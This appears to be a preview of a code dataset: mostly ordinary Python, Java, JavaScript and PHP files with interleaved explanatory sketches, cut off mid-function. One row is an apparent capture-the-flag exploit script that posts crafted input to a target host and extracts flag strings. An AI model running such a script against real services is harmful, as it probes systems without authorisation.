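Column summary: `language` (string, 15 distinct values), `src_encoding` (string, 34 distinct values), `length_bytes` (int64, 6 to 7.85M), `score` (float64, 1.5 to 5.69), `int_score` (int64, 2 to 5), `detected_licenses` (list, 0 to 160 entries), `license_type` (string, 2 distinct values), `text` (string, 9 to 7.85M characters).

| language | src_encoding | length_bytes | score | int_score | detected_licenses | license_type | text |
|---|---|---|---|---|---|---|---|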

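| Python | UTF-8 | 208 | 3.0625 | 3 | [] | no_license |

```python
# AAAABBBBCCDDD->A4B4C2D3
# Emits each character followed by its count, in order of first appearance.
# Note: line.count() counts all occurrences, so non-adjacent repeats are merged
# ('AABA' -> A3B1); this is not a true run-length encoding.
line = 'ABBCDDD'
list1 = []
for i in line:
    x = line.count(i)
    if i not in list1:
        list1.append(i)
        list1.append(x)

x = ''
for i in list1:
    x += str(i)
print(x)  # A1B2C1D3
```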
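The loop above counts each character's total occurrences. That matches the `AAAABBBBCCDDD->A4B4C2D3` comment only because every letter there forms a single run. If the goal is true run-length encoding, where `AABA` becomes `A2B1A1`, here is a minimal sketch using the standard library's `itertools.groupby`. The function name `run_length_encode` is chosen here for illustration:

```python
from itertools import groupby


def run_length_encode(s: str) -> str:
    """Encode each maximal run of equal characters as <char><run length>."""
    # groupby yields one (char, iterator) pair per run of consecutive equal characters
    return ''.join(f"{ch}{sum(1 for _ in run)}" for ch, run in groupby(s))


print(run_length_encode('AAAABBBBCCDDD'))  # A4B4C2D3
print(run_length_encode('AABA'))           # A2B1A1
```

Because `groupby` only merges adjacent equal items, a letter that reappears later starts a new run. This is exactly what distinguishes run-length encoding from the occurrence count above.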

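| Java | UTF-8 | 370 | 2.859375 | 3 | [] | no_license |

```java
class Solution {
    // Counts the primes strictly less than n by trial division.
    public int countPrimes(int n) {
        if (n <= 1) {
            return 0;
        }
        int count = 0;
        for (int i = 2; i < n; i++) {
            boolean isPrime = true;
            // A composite i always has a divisor no larger than sqrt(i);
            // j <= i / j avoids the int overflow that j * j <= i could hit.
            for (int j = 2; j <= i / j; j++) {
                if (i % j == 0) {
                    isPrime = false;
                    break;
                }
            }
            if (isPrime) {
                count++;
            }
        }
        return count;
    }
}
```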
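Trial division tests every candidate on its own. A common alternative for counting the primes below `n` is the Sieve of Eratosthenes, which crosses out the multiples of each prime once. The sketch below shows that technique in Python; it is not a port of the Java class, and the name `count_primes` is chosen here:

```python
def count_primes(n: int) -> int:
    """Count the primes p with 2 <= p < n (same contract as countPrimes above)."""
    if n < 3:
        return 0  # there are no primes below 2
    is_prime = [True] * n  # is_prime[k] answers "is k prime?" for 0 <= k < n
    is_prime[0] = is_prime[1] = False
    p = 2
    while p * p < n:
        if is_prime[p]:
            # Multiples of p below p*p were already crossed out by smaller primes.
            for multiple in range(p * p, n, p):
                is_prime[multiple] = False
        p += 1
    return sum(is_prime)


print(count_primes(10))  # 4 (2, 3, 5, 7)
```

The sieve trades O(n) memory for roughly O(n log log n) time. Trial division uses constant memory but repeats work for every candidate.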

| Python | UTF-8 | 964 | 2.71875 | 3 | [] | no_license |

```python
#!/usr/bin/python2.7
#coding:utf-8
from sys import *
import requests
import re, string, random
# import hackhttp

# Usage: <script> <host> <port>
host = argv[1]
port = int(argv[2])
timeout = 30
target = "http://%s:%s" % (host, port)


def randomString(stringLength=10):
    """Generate a random string of fixed length."""
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))


def gen_str_atk(i):
    # Draw random lowercase strings of length i until the sum of
    # their character codes is exactly 1024.
    text = randomString(i)
    v = sum(map(ord, text))
    while v != 1024:
        text = randomString(i)
        v = sum(map(ord, text))
    # v is always 1024 here, so the second element is always True.
    return text, (v % 2 == 0)


def exp():
    try:
        # gen_str_atk returns a (text, flag) tuple; requests form-encodes a
        # tuple value as repeated 'content' fields.
        t = requests.post(target + '/post',
                          data={'title': 'a', 'author': 'b', 'content': gen_str_atk(9)},
                          timeout=timeout,
                          headers={'User-Agent': 'checker'}).text
        # print(t)
        rr = re.findall(r'flag{.*?}', t)
        print(rr)
        return rr
    except Exception as e:
        print('fail')
        exit(0)


if __name__ == '__main__':
    print(exp())
```

| Java | UTF-8 | 2,359 | 2.5 | 2 | [] | no_license |

```java
package com.okry.amt.ui.animhoriscroll;

import android.content.Context;
import android.view.View;

import java.util.List;

/**
 * Created by marui on 13-11-26.
 */
public abstract class BaseHoriScrollItemAdapter<T> {

    protected List<T> mList;
    private HoriDataSetObserver mDataSetObserver;

    public abstract View initView(LinearHoriScrollView parent, Context context, int position);

    public int getCount() {
        return mList == null ? 0 : mList.size();
    }

    public T getItem(int position) {
        if (mList != null && position >= 0 && position < mList.size()) {
            return mList.get(position);
        }
        return null;
    }

    public void setData(List<T> list) {
        mList = list;
    }

    public void remove(int position) {
        if (mList != null) {
            mList.remove(position);
            if (mDataSetObserver != null) {
                mDataSetObserver.onRemove(position);
            }
        }
    }

    public void remove(T item) {
        if (mList != null) {
            int index = indexOf(item);
            // indexOf returns -1 for an absent item; List.remove(-1) would throw.
            if (index < 0) {
                return;
            }
            mList.remove(index);
            if (mDataSetObserver != null) {
                mDataSetObserver.onRemove(index);
            }
        }
    }

    private int indexOf(T item) {
        for (int i = 0; i < mList.size(); i++) {
            if (item.equals(mList.get(i))) return i;
        }
        return -1;
    }

    /**
     * Register an observer that is called when changes happen to the data used by this adapter.
     *
     * @param observer the object that gets notified when the data set changes.
     */
    public void registerDataSetObserver(HoriDataSetObserver observer) {
        mDataSetObserver = observer;
    }

    /**
     * Unregister an observer that has previously been registered with this
     * adapter via {@link #registerDataSetObserver}.
     *
     * @param observer the object to unregister.
     */
    public void unregisterDataSetObserver(HoriDataSetObserver observer) {
        // Only clear the observer if it is the one that was registered.
        if (mDataSetObserver == observer) {
            mDataSetObserver = null;
        }
    }

    public void notifyDataSetChange() {
        if (mDataSetObserver != null) {
            mDataSetObserver.onInvalidated();
        }
    }

    public interface HoriDataSetObserver {
        public void onAdd(int position);

        public void onRemove(int position);

        public void onInvalidated();
    }
}
```

| JavaScript | UTF-8 | 3,313 | 2.546875 | 3 | [] | no_license |

```javascript
/**
 * @fileOverview Authentication (Signin and signup) action file
 *
 * @author Paradise Kelechi
 *
 * @requires NPM:axios
 * @requires NPM:querystring
 * @requires NPM:react-router
 * @requires ../helpers/Constants
 * @requires ../../tools/Routes
 * @requires ../helpers/Alert
 * @requires ../helpers/Authentication
 */
import axios from 'axios';
import querystring from 'querystring';
import { browserHistory } from 'react-router';
import {
  SIGNIN_USER,
  GOOGLE_SIGNIN_USER,
  SIGNUP_USER,
  LOGOUT_USER,
} from '../helpers/Constants';
import routes from '../../tools/Routes';
import {
  authenticatePersist,
  authenticateClear
} from '../helpers/Authentication';
import Alert from '../helpers/Alert';

/**
 * Extracts a message from an axios error. Network failures and timeouts
 * have no `response`, so fall back to the error's own message.
 *
 * @param {Error} error
 *
 * @returns {string} message to show the user
 */
const errorMessage = error => (
  error.response && error.response.data
    ? error.response.data.message
    : error.message
);

export const signinUserAsync = data => ({
  type: SIGNIN_USER,
  payload: data
});

/**
 * Signin user action
 *
 * @export signinUser
 *
 * @param {Object} user
 *
 * @returns {Function} thunk that posts the credentials and dispatches SIGNIN_USER
 */
export const signinUser = (user) => {
  const formdata = querystring.stringify({
    username: user.username,
    password: user.password
  });
  return (dispatch) => {
    return axios.post(`${routes.signin}`, formdata)
      .then((response) => {
        const responseData = response.data;
        authenticatePersist(responseData.token);
        dispatch(signinUserAsync(responseData));
        browserHistory.push('/books');
      }).catch((error) => {
        Alert('error', errorMessage(error), null);
      });
  };
};

export const signupUserAsync = user => ({
  type: SIGNUP_USER,
  payload: user
});

/**
 * Signup user action
 *
 * @export signupUser
 * @param {object} user
 * @returns {Function} thunk that posts the new account and dispatches SIGNUP_USER
 */
export const signupUser = (user) => {
  const formdata = querystring.stringify({
    username: user.username,
    password: user.password,
    email: user.email
  });
  return (dispatch) => {
    const request = axios.post(`${routes.signup}`, formdata);
    return request
      .then((response) => {
        authenticatePersist(response.data.token);
        dispatch(signupUserAsync(response.data));
        browserHistory.push('/books');
      }).catch((error) => {
        Alert('error', errorMessage(error), null);
      });
  };
};

export const googleSigninUserAsync = payload => ({
  type: GOOGLE_SIGNIN_USER,
  payload
});

/**
 * Google signin user action
 *
 * @export googleSigninUser
 *
 * @param {Object} user
 *
 * @returns {Function} thunk that posts the Google user and dispatches GOOGLE_SIGNIN_USER
 */
export const googleSigninUser = (user) => {
  const formdata = querystring.stringify({
    username: user.username,
    password: user.password,
    email: user.email
  });
  return (dispatch) => {
    const request = axios.post(`${routes.googleSignin}`, formdata);
    return request
      .then((response) => {
        authenticatePersist(response.data.token);
        dispatch(googleSigninUserAsync(response.data));
        browserHistory.push('/books');
      }).catch((error) => {
        Alert('error', errorMessage(error), null);
      });
  };
};

export const logoutUserAsync = user => ({
  type: LOGOUT_USER,
  user
});

/**
 * Logout user action
 *
 * @export logoutUser
 *
 * @param {Object} user
 *
 * @returns {Function} thunk that clears the stored token and dispatches LOGOUT_USER
 */
export const logoutUser = (user) => {
  return (dispatch) => {
    authenticateClear();
    dispatch(logoutUserAsync(user));
    browserHistory.push('/signin');
  };
};
```

| Java | UTF-8 | 1,224 | 2.0625 | 2 | [] | no_license |

```java
package com.junyou.bus.xingkongbaozang.configure.export;

import java.util.Map;

import com.junyou.configure.vo.GoodsConfigureVo;

/**
 *
 * @description Seven-day server-launch event configuration table (全民修仙)
 *
 * @author ZHONGDIAN
 * @date 2013-12-12 11:43:48
 */
public class XkbzConfig {

    private Integer id;

    private Integer jifen; // concrete value for the spending type

    // Reward items for server-side use (general and class-specific rewards merged)
    private Map<String, GoodsConfigureVo> itemMap;

    // Reward items for the client (general and class-specific rewards merged)
    private String jianLiClient;

    public Integer getId() {
        return id;
    }

    public void setId(Integer id) {
        this.id = id;
    }

    public Integer getJifen() {
        return jifen;
    }

    public void setJifen(Integer jifen) {
        this.jifen = jifen;
    }

    public Map<String, GoodsConfigureVo> getItemMap() {
        return itemMap;
    }

    public void setItemMap(Map<String, GoodsConfigureVo> itemMap) {
        this.itemMap = itemMap;
    }

    public String getJianLiClient() {
        return jianLiClient;
    }

    public void setJianLiClient(String jianLiClient) {
        this.jianLiClient = jianLiClient;
    }

    // Values sent to the client: id, jifen and the client-side reward string.
    public Object[] getVo() {
        return new Object[]{
            getId(),
            getJifen(),
            getJianLiClient()
        };
    }
}
```

| JavaScript | UTF-8 | 18,732 | 3.453125 | 3 | ["MIT"] | permissive |

```javascript
// Small 3D vector class. Instance methods return new vectors; the static
// Vector.* helpers further down write their result into an output vector instead.
(function() {
  function Vector(x, y, z) {
    this.x = x || 0;
    this.y = y || 0;
    this.z = z || 0;
  }

  Vector.prototype = {
    negative: function() {
      return new Vector(-this.x, -this.y, -this.z);
    },
    add: function(v) {
      if (v instanceof Vector) return new Vector(this.x + v.x, this.y + v.y, this.z + v.z);
      else return new Vector(this.x + v, this.y + v, this.z + v);
    },
    subtract: function(v) {
      if (v instanceof Vector) return new Vector(this.x - v.x, this.y - v.y, this.z - v.z);
      else return new Vector(this.x - v, this.y - v, this.z - v);
    },
    multiply: function(v) {
      if (v instanceof Vector) return new Vector(this.x * v.x, this.y * v.y, this.z * v.z);
      else return new Vector(this.x * v, this.y * v, this.z * v);
    },
    divide: function(v) {
      if (v instanceof Vector) return new Vector(this.x / v.x, this.y / v.y, this.z / v.z);
      else return new Vector(this.x / v, this.y / v, this.z / v);
    },
    equals: function(v) {
      return this.x == v.x && this.y == v.y && this.z == v.z;
    },
    dot: function(v) {
      return this.x * v.x + this.y * v.y + this.z * v.z;
    },
    cross: function(v) {
      return new Vector(
        this.y * v.z - this.z * v.y,
        this.z * v.x - this.x * v.z,
        this.x * v.y - this.y * v.x
      );
    },
    length: function() {
      return Math.sqrt(this.dot(this));
    },
    unit: function() {
      return this.divide(this.length());
    },
    min: function() {
      return Math.min(Math.min(this.x, this.y), this.z);
    },
    max: function() {
      return Math.max(Math.max(this.x, this.y), this.z);
    },
    toAngles: function() {
      return {
        theta: Math.atan2(this.z, this.x),
        phi: Math.asin(this.y / this.length())
      };
    },
    angleTo: function(a) {
      return Math.acos(this.dot(a) / (this.length() * a.length()));
    },
    toArray: function(n) {
      return [this.x, this.y, this.z].slice(0, n || 3);
    },
    clone: function() {
      return new Vector(this.x, this.y, this.z);
    },
    init: function(x, y, z) {
      this.x = x; this.y = y; this.z = z;
      return this;
    },
    // Zero the z component in place (used for 2D motion).
    noZ: function() {
      this.z = 0;
      return this;
    }
  };

  Vector.negative = function(a, b) {
    b.x = -a.x; b.y = -a.y; b.z = -a.z;
    return b;
  };
  Vector.add = function(a, b, c) {
    if (b instanceof Vector) { c.x = a.x + b.x; c.y = a.y + b.y; c.z = a.z + b.z; }
    else { c.x = a.x + b; c.y = a.y + b; c.z = a.z + b; }
    return c;
  };
  Vector.subtract = function(a, b, c) {
    if (b instanceof Vector) { c.x = a.x - b.x; c.y = a.y - b.y; c.z = a.z - b.z; }
    else { c.x = a.x - b; c.y = a.y - b; c.z = a.z - b; }
    return c;
  };
  Vector.multiply = function(a, b, c) {
    if (b instanceof Vector) { c.x = a.x * b.x; c.y = a.y * b.y; c.z = a.z * b.z; }
    else { c.x = a.x * b; c.y = a.y * b; c.z = a.z * b; }
    return c;
  };
  Vector.divide = function(a, b, c) {
    if (b instanceof Vector) { c.x = a.x / b.x; c.y = a.y / b.y; c.z = a.z / b.z; }
    else { c.x = a.x / b; c.y = a.y / b; c.z = a.z / b; }
    return c;
  };
  Vector.cross = function(a, b, c) {
    c.x = a.y * b.z - a.z * b.y;
    c.y = a.z * b.x - a.x * b.z;
    c.z = a.x * b.y - a.y * b.x;
    return c;
  };
  Vector.unit = function(a, b) {
    var length = a.length();
    b.x = a.x / length;
    b.y = a.y / length;
    b.z = a.z / length;
    return b;
  };
  Vector.fromAngles = function(theta, phi) {
    return new Vector(Math.cos(theta) * Math.cos(phi), Math.sin(phi), Math.sin(theta) * Math.cos(phi));
  };
  Vector.randomDirection = function() {
    return Vector.fromAngles(Math.random() * Math.PI * 2, Math.asin(Math.random() * 2 - 1));
  };
  Vector.min = function(a, b) {
    return new Vector(Math.min(a.x, b.x), Math.min(a.y, b.y), Math.min(a.z, b.z));
  };
  Vector.max = function(a, b) {
    return new Vector(Math.max(a.x, b.x), Math.max(a.y, b.y), Math.max(a.z, b.z));
  };
  Vector.lerp = function(a, b, fraction) {
    return b.subtract(a).multiply(fraction).add(a);
  };
  Vector.fromArray = function(a) {
    return new Vector(a[0], a[1], a[2]);
  };
  Vector.angleBetween = function(a, b) {
    return a.angleTo(b);
  };

  window.Vector = Vector;
})();
```

```javascript
(function() {
  'use strict';

  // Configuration options
  var opts = {
    background: 'black',
    numberOrbs: 150, // increase with screen size. 50 to 100 for my 2560 x 1400 monitor
    maxVelocity: 2.5, // increase with screen size--dramatically affects line density. 2-3 for me
    orbRadius: 1, // keep small unless you really want to see the dots bouncing. I like <= 1.
    minProximity: 100, // controls how close dots have to come to each other before lines are traced
    initialColorAngle: 7, // initialize the color angle, default = 7
    colorFrequency: 0.3, // 0.3 default
    colorAngleIncrement: 0.009, // 0.009 is slow and even
    globalAlpha: 0.010, // controls alpha for lines, but not dots (despite the name)
    manualWidth: false, // Default: false. Set your own custom width to override width = window.innerWidth. Yes, I know I'm mixing types here, sue me.
    manualHeight: false // Default: false. Set your own custom height to override height = window.innerHeight
  };

  // Canvas globals
  var canvasTop, linecxt, canvasBottom, cxt, width, height, animationFrame;

  // Global objects
  var orbs;

  // Orb object - these are the guys that bounce around the screen.
  // We will draw lines between these dots, but that behavior is found
  // in the Orbs container object.
  var Orb = (function() {
    // Constructor
    function Orb(radius, color) {
      var posX = randBetween(0, width);
      var posY = randBetween(0, height);
      this.position = new Vector(posX, posY);

      var velS = randBetween(0, opts.maxVelocity); // Velocity scalar
      this.velocity = Vector.randomDirection().multiply(velS).noZ();

      this.radius = radius;
      this.color = color;
    }

    // Orb methods
    Orb.prototype = {
      update: function() {
        // position = position + velocity
        this.position = this.position.add(this.velocity);

        // Bounce if the dot reaches the edge of the container.
        // This can be EXTREMELY buggy with large dot radii, but it works for this drawing.
        if (this.position.x + this.radius >= width || this.position.x - this.radius <= 0) {
          this.velocity.x = this.velocity.x * -1;
        }
        if (this.position.y + this.radius >= height || this.position.y - this.radius <= 0) {
          this.velocity.y = this.velocity.y * -1;
        }
      },

      display: function() {
        cxt.beginPath();
        cxt.fillStyle = this.color;
        cxt.ellipse(this.position.x, this.position.y, this.radius, this.radius, 0, 0, 2 * Math.PI, false);
        cxt.fill();
        cxt.closePath();
      },

      run: function() {
        this.update();
        this.display();
      }
    };

    return Orb;
  })();

  // Orbs object - this is a container that manages all of the individual Orb objects.
  // In addition, this object holds the color phasing and line-drawing functionality,
  // since it already iterates over all the orbs once per frame anyway.
  var Orbs = (function() {
    // Constructor
    function Orbs(numberOrbs, radius, initialColorAngle, globalAlpha, colorAngleIncrement, colorFrequency) {
      this.orbs = [];
      this.colorAngle = initialColorAngle;
      this.colorAngleIncrement = colorAngleIncrement;
      this.globalAlpha = globalAlpha;
      this.colorFrequency = colorFrequency;
      this.color = null; // set by phaseColor() at the start of every frame

      for (var i = 0; i < numberOrbs; i++) {
        this.orbs.push(new Orb(radius, this.color));
      }
    }

    Orbs.prototype = {
      run: function() {
        this.phaseColor();
        for (var i = 0; i < this.orbs.length; i++) {
          for (var j = i + 1; j < this.orbs.length; j++) {
            // We only compare this orb to orbs further along in the array,
            // since any that came before have already been compared to it.
            this.compare(this.orbs[i], this.orbs[j]);
          }
          this.orbs[i].color = this.color;
          this.orbs[i].run();
        }
      },

      compare: function(orbA, orbB) {
        // Distance between the two orbs (length() is never negative).
        var distance = orbA.position.subtract(orbB.position).length();

        if (distance <= opts.minProximity) {
          // The important thing to note here is that we draw this onto '#canvas-top',
          // since we want to preserve everything drawn to that layer.
          linecxt.beginPath();
          linecxt.strokeStyle = this.color;
          linecxt.globalAlpha = this.globalAlpha;
          linecxt.moveTo(orbA.position.x, orbA.position.y);
          linecxt.lineTo(orbB.position.x, orbB.position.y);
          linecxt.stroke();
          linecxt.closePath();
        }
      },

      phaseColor: function() {
        // color component = sin(freq * angle + phaseOffset) => (between -1 and 1) * 127 + 128
        var r = Math.floor(Math.sin(this.colorFrequency * this.colorAngle + Math.PI * 0 / 3) * 127 + 128);
        var g = Math.floor(Math.sin(this.colorFrequency * this.colorAngle + Math.PI * 2 / 3) * 127 + 128);
        var b = Math.floor(Math.sin(this.colorFrequency * this.colorAngle + Math.PI * 4 / 3) * 127 + 128);
        this.color = 'rgba(' + r + ', ' + g + ', ' + b + ', 1)';
        this.colorAngle += this.colorAngleIncrement;
      }
    };

    return Orbs;
  })();

  // This function is called once and only once to kick off the code.
  // It links DOM objects like the canvas to the respective global variable.
  function initialize() {
    canvasTop = document.querySelector('#canvas-top'); // this canvas is for the lines between dots
    canvasBottom = document.querySelector('#canvas-bottom'); // this canvas is for the dots that bounce around
    linecxt = canvasTop.getContext('2d');
    cxt = canvasBottom.getContext('2d');

    window.addEventListener('resize', resize, false);
    resize();
  }

  // This function is called after initialization and on every window resize.
  function resize() {
    width = opts.manualWidth ? opts.manualWidth : window.innerWidth;
    height = opts.manualHeight ? opts.manualHeight : window.innerHeight;
    setup();
  }

  // After a window resize we need to resize both canvases and rebuild the orbs.
  function setup() {
    canvasTop.width = width;
    canvasTop.height = height;
    canvasBottom.width = width;
    canvasBottom.height = height;

    //fillBackground(linecxt); // Enable this line if you want to save an image of the drawing.
    fillBackground(cxt);

    orbs = new Orbs(opts.numberOrbs, opts.orbRadius, opts.initialColorAngle, opts.globalAlpha, opts.colorAngleIncrement, opts.colorFrequency);

    // If we hit this line, it was either via initialization (animationFrame is undefined)
    // or through a window resize, in which case we cancel the old draw loop and start a new one.
    if (animationFrame !== undefined) { cancelAnimationFrame(animationFrame); }
    draw();
  }

  // Notice that we only fillBackground on one of the two canvases. This is because we want to animate
  // the dot layer (we don't want to leave trails left by the dots), but preserve the line layer.
  function draw() {
    fillBackground(cxt);
    orbs.run();
    // Update the global animationFrame variable so the redraw loop can be cancelled on resize.
    animationFrame = requestAnimationFrame(draw);
  }

  // generic background fill function
  function fillBackground(context) {
    context.fillStyle = opts.background;
    context.fillRect(0, 0, width, height);
  }

  // get a random float in [low, high): low is inclusive, high is exclusive
  function randBetween(low, high) {
    return Math.random() * (high - low) + low;
  }

  // get a random INT between two numbers, both inclusive
  function randIntBetween(low, high) {
    return Math.floor(Math.random() * (high - low + 1) + low);
  }

  // Start the code already, dammit!
  initialize();
})();
```

```javascript
var container = $(".nav-container"),
    target = $(".hero-banner").outerHeight() - 60;

// Add the compact nav style once the page scrolls past the hero banner.
$(window).scroll(function() {
  if ($(window).scrollTop() >= target) {
    container.addClass("scroll-nav");
  } else {
    container.removeClass("scroll-nav");
  }
}); // End scroll

// Typing Stuff
// set animation timing
var animationDelay = 2500,
    // loading bar effect
    barAnimationDelay = 3800,
    barWaiting = barAnimationDelay - 3000, // 3000 is the duration of the transition on the loading bar - set in the scss/css file
    // letters effect
    lettersDelay = 50,
    // type effect
    typeLettersDelay = 150,
    selectionDuration = 500,
    typeAnimationDelay = selectionDuration + 800,
    // clip effect
    revealDuration = 600,
    revealAnimationDelay = 1500;

initHeadline();

function initHeadline() {
  // insert <i> element for each letter of a changing word
  singleLetters($('.cd-headline.letters').find('b'));
  // initialise headline animation
  animateHeadline($('.cd-headline'));
}

function singleLetters(words) {
  words.each(function() {
    var word = $(this),
        letters = word.text().split(''),
        selected = word.hasClass('is-visible');
    // Indexed loop with a local i (no implicit global).
    for (var i = 0; i < letters.length; i++) {
      if (word.parents('.rotate-2').length > 0) letters[i] = '<em>' + letters[i] + '</em>';
      letters[i] = selected ? '<i class="in">' + letters[i] + '</i>' : '<i>' + letters[i] + '</i>';
    }
    var newLetters = letters.join('');
    word.html(newLetters).css('opacity', 1);
  });
}

function animateHeadline($headlines) {
  var duration = animationDelay;
  $headlines.each(function() {
    var headline = $(this);

    if (headline.hasClass('loading-bar')) {
      duration = barAnimationDelay;
      setTimeout(function() {
        headline.find('.cd-words-wrapper').addClass('is-loading');
      }, barWaiting);
    } else if (headline.hasClass('clip')) {
      var spanWrapper = headline.find('.cd-words-wrapper'),
          newWidth = spanWrapper.width() + 10;
      spanWrapper.css('width', newWidth);
    } else if (!headline.hasClass('type')) {
      // assign to .cd-words-wrapper the width of its longest word
      var words = headline.find('.cd-words-wrapper b'),
          width = 0;
      words.each(function() {
        var wordWidth = $(this).width();
        if (wordWidth > width) width = wordWidth;
      });
      headline.find('.cd-words-wrapper').css('width', width);
    }

    // trigger animation
    setTimeout(function() {
      hideWord(headline.find('.is-visible').eq(0));
    }, duration);
  });
}

function hideWord(word) {
  var nextWord = takeNext(word);

  if (word.parents('.cd-headline').hasClass('type')) {
    var parentSpan = word.parent('.cd-words-wrapper');
    parentSpan.addClass('selected').removeClass('waiting');
    setTimeout(function() {
      parentSpan.removeClass('selected');
      word.removeClass('is-visible').addClass('is-hidden').children('i').removeClass('in').addClass('out');
    }, selectionDuration);
    setTimeout(function() {
      showWord(nextWord, typeLettersDelay);
    }, typeAnimationDelay);
  } else if (word.parents('.cd-headline').hasClass('letters')) {
    var bool = word.children('i').length >= nextWord.children('i').length;
    hideLetter(word.find('i').eq(0), word, bool, lettersDelay);
    showLetter(nextWord.find('i').eq(0), nextWord, bool, lettersDelay);
  } else if (word.parents('.cd-headline').hasClass('clip')) {
    word.parents('.cd-words-wrapper').animate({
      width: '2px'
    }, revealDuration, function() {
      switchWord(word, nextWord);
      showWord(nextWord);
    });
  } else if (word.parents('.cd-headline').hasClass('loading-bar')) {
    word.parents('.cd-words-wrapper').removeClass('is-loading');
    switchWord(word, nextWord);
    setTimeout(function() {
      hideWord(nextWord);
    }, barAnimationDelay);
    setTimeout(function() {
      word.parents('.cd-words-wrapper').addClass('is-loading');
    }, barWaiting);
  } else {
    switchWord(word, nextWord);
    setTimeout(function() {
      hideWord(nextWord);
    }, animationDelay);
  }
}

function showWord(word, $duration) {
  if (word.parents('.cd-headline').hasClass('type')) {
    showLetter(word.find('i').eq(0), word, false, $duration);
    word.addClass('is-visible').removeClass('is-hidden');
  } else if (word.parents('.cd-headline').hasClass('clip')) {
    word.parents('.cd-words-wrapper').animate({
      'width': word.width() + 10
    }, revealDuration, function() {
      setTimeout(function() {
        hideWord(word);
      }, revealAnimationDelay);
    });
  }
}

function hideLetter($letter, word, $bool, $duration) {
  $letter.removeClass('in').addClass('out');

  if (!$letter.is(':last-child')) {
    setTimeout(function() {
      hideLetter($letter.next(), word, $bool, $duration);
    }, $duration);
  } else if ($bool) {
    setTimeout(function() {
      hideWord(takeNext(word));
    }, animationDelay);
  }

  if ($letter.is(':last-child') && $('html').hasClass('no-csstransitions')) {
    var nextWord = takeNext(word);
    switchWord(word, nextWord);
  }
}

function showLetter($letter, word, $bool, $duration) {
  $letter.addClass('in').removeClass('out');

  if (!$letter.is(':last-child')) {
    setTimeout(function() {
      showLetter($letter.next(), word, $bool, $duration);
    }, $duration);
  } else {
    if (word.parents('.cd-headline').hasClass('type')) {
      setTimeout(function() {
        word.parents('.cd-words-wrapper').addClass('waiting');
      }, 200);
    }
    if (!$bool) {
      setTimeout(function() {
        hideWord(word);
      }, animationDelay);
    }
  }
}

function takeNext(word) {
  return (!word.is(':last-child')) ? word.next() : word.parent().children().eq(0);
}

function takePrev(word) {
  return (!word.is(':first-child')) ? word.prev() : word.parent().children().last();
}

function switchWord($oldWord, $newWord) {
  $oldWord.removeClass('is-visible').addClass('is-hidden');
  $newWord.removeClass('is-hidden').addClass('is-visible');
}

$(document).on("click", ".call-button", function(e) {
  e.preventDefault();
  // Make something fancy happen
  $('.call-form').toggle();
});

var main = document.getElementById('main');

function checkNav() {
  if (main.classList.contains('active')) {
    closeNav();
  } else {
    openNav();
  }
}

function openNav() {
  main.classList.add('active');
}

function closeNav() {
  main.classList.remove('active');
}

window.onload = function() {
  $(".containerquay").fadeOut('fast').delay(2000).queue(function() { $(this).remove(); });
};
```
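`phaseColor` derives each RGB channel from the same sine wave, shifted by 0, 2π/3 and 4π/3. As `colorAngle` grows, the three channels peak in turn. The Python sketch below reproduces that formula for a single angle. The name `phase_color` is hypothetical, and `frequency=0.3` mirrors the `colorFrequency` default in `opts`:

```python
import math


def phase_color(angle: float, frequency: float = 0.3) -> tuple:
    """Return (r, g, b) using the same formula as Orbs.prototype.phaseColor."""

    def channel(offset: float) -> int:
        # sin() lies in [-1, 1], so each channel lands in [1, 255] after scaling and flooring
        return math.floor(math.sin(frequency * angle + offset) * 127 + 128)

    # The three channels share one sine wave shifted by 0, 2*pi/3 and 4*pi/3
    return (channel(0.0), channel(2 * math.pi / 3), channel(4 * math.pi / 3))


# Successive frames advance the angle by colorAngleIncrement (0.009 in opts)
angle = 7.0  # initialColorAngle
for frame in range(3):
    print(frame, phase_color(angle))
    angle += 0.009
```

With an increment of 0.009 and a frequency of 0.3, one full colour cycle takes about 2π / (0.3 × 0.009) ≈ 2,327 frames. That is why the default reads as a slow, even fade.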

| PHP | UTF-8 | 2,520 | 3.078125 | 3 | ["MIT"] | permissive |

```php
<?php

namespace AsyncAws\CloudWatch\ValueObject;

use AsyncAws\Core\Exception\InvalidArgument;

/**
 * Represents a set of statistics that describes a specific metric.
 */
final class StatisticSet
{
    /**
     * The number of samples used for the statistic set.
     *
     * @var float
     */
    private $sampleCount;

    /**
     * The sum of values for the sample set.
     *
     * @var float
     */
    private $sum;

    /**
     * The minimum value of the sample set.
     *
     * @var float
     */
    private $minimum;

    /**
     * The maximum value of the sample set.
     *
     * @var float
     */
    private $maximum;

    /**
     * @param array{
     *   SampleCount: float,
     *   Sum: float,
     *   Minimum: float,
     *   Maximum: float,
     * } $input
     */
    public function __construct(array $input)
    {
        $this->sampleCount = $input['SampleCount'] ?? $this->throwException(new InvalidArgument('Missing required field "SampleCount".'));
        $this->sum = $input['Sum'] ?? $this->throwException(new InvalidArgument('Missing required field "Sum".'));
        $this->minimum = $input['Minimum'] ?? $this->throwException(new InvalidArgument('Missing required field "Minimum".'));
        $this->maximum = $input['Maximum'] ?? $this->throwException(new InvalidArgument('Missing required field "Maximum".'));
    }

    /**
     * @param array{
     *   SampleCount: float,
     *   Sum: float,
     *   Minimum: float,
     *   Maximum: float,
     * }|StatisticSet $input
     */
    public static function create($input): self
    {
        return $input instanceof self ? $input : new self($input);
    }

    public function getMaximum(): float
    {
        return $this->maximum;
    }

    public function getMinimum(): float
    {
        return $this->minimum;
    }

    public function getSampleCount(): float
    {
        return $this->sampleCount;
    }

    public function getSum(): float
    {
        return $this->sum;
    }

    /**
     * @internal
     */
    public function requestBody(): array
    {
        $payload = [];
        $v = $this->sampleCount;
        $payload['SampleCount'] = $v;
        $v = $this->sum;
        $payload['Sum'] = $v;
        $v = $this->minimum;
        $payload['Minimum'] = $v;
        $v = $this->maximum;
        $payload['Maximum'] = $v;

        return $payload;
    }

    /**
     * @return never
     */
    private function throwException(\Throwable $exception)
    {
        throw $exception;
    }
}
```
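`StatisticSet` carries pre-aggregated values rather than raw data points. The Python sketch below shows where those four numbers come from: it builds the same `SampleCount`/`Sum`/`Minimum`/`Maximum` payload from a list of samples. It also mirrors the constructor's missing-field check, treating a `None` value as missing the way PHP's `??` does. `StatisticSetSketch` and its methods are hypothetical names; they are not part of AsyncAws or any AWS SDK:

```python
from dataclasses import dataclass
from typing import Dict, Iterable

REQUIRED_FIELDS = ("SampleCount", "Sum", "Minimum", "Maximum")


@dataclass(frozen=True)
class StatisticSetSketch:
    sample_count: float
    total: float  # serialized as "Sum"
    minimum: float
    maximum: float

    @classmethod
    def from_input(cls, data: Dict[str, float]) -> "StatisticSetSketch":
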